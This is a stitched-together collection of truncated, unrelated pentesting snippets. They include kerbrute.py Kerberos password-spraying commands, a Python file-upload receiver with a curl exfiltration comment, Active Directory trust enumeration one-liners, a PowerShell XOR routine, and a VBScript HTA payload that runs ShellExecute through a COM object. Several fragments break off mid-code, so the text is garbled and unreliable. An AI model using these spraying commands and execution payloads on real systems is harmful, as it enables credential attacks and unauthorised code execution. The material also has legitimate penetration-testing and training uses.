With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
[DllImport("shell32.dll", SetLastError = true)] | |
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); | |
public static string[] CommandLineToArgs(string commandLine) | |
{ | |
int argc; | |
var argv = CommandLineToArgvW(commandLine, out argc); | |
if (argv == IntPtr.Zero) | |
throw new System.ComponentModel.Win32Exception(); | |
try |
# Not secure by any means, just a PoC for XOR'ing data using powershell | |
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption | |
$enc = [System.Text.Encoding]::UTF8 | |
function xor { | |
param($string, $method) | |
$xorkey = $enc.GetBytes("secretkey") | |
if ($method -eq "decrypt"){ |
#!/usr/env python3 | |
import http.server | |
import socketserver | |
import io | |
import cgi | |
# Change this to serve on a different port | |
PORT = 80 | |
# curl -F "[email protected]" http://<ip>:80/file.txt |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Instructions for Recon-NG v4.8.3:
API Keys:
bing_api (optional $$$) - Sign up here (I chose the free plan), agree to all the terms until you get to "Thank You", then go here to view the key. (free account: 5000 transactions per month)
builtwith_api - Go here and sign up. Once you enter an email and password, it will show you the API key
censysio_id - Go here and sign up. Once you register, confirm your account by clicking on the link in the email. Then login and go here to view the "ID" and "Secret"
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
#!/usr/bin/env python3 | |
# python3 update of https://gist.github.com/dergachev/7028596 | |
# Create a basic certificate using openssl: | |
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
# Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html | |
import http.server | |
import ssl | |
httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler) |
package main | |
import ( | |
"bytes" | |
"code.google.com/p/go.crypto/openpgp" | |
"encoding/base64" | |
"io/ioutil" | |
"log" | |
"os" | |
) |
<script language="VBScript"> | |
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0 | |
self.close | |
</script> |